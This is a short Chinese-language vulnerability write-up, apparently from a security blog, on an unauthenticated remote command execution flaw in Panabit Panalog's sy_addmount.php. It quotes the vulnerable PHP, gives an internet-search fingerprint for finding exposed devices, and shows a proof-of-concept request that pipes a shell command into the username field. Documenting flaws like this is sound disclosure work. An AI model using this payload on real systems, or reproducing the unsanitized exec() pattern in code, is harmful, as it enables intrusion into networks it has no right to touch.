Panabit Panalog sy_addmount.php 远程命令执行漏洞

漏洞描述

Panabit Panalog sy_addmount.php过滤不足,导致远程命令执行漏洞。

漏洞影响

Panabit Panalog

网络测绘

body=”Maintain/cloud_index.php”

漏洞复现

登录页面

20240326102357159-png

存在漏洞的代码为 account/sy_addmount.php

<?php

include(dirname(__FILE__)."/../common.php");

$username = isset($_REQUEST["username"]) ? $_REQUEST["username"] : "";
if (empty($username)) {
	echo '{"success":"no", "out":"NO_USER"}';
	exit;
}

$username = addslashes($username);

$rows = array();

$cmd = PANALOGEYE." behavior add account=$username";
exec($cmd, $out, $ret);
echo $out[0];
exit;

其中没有对身份进行鉴权,且 username 可控,构造POC

POST /account/sy_addmount.php

username=|id

20240326102441128-png (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容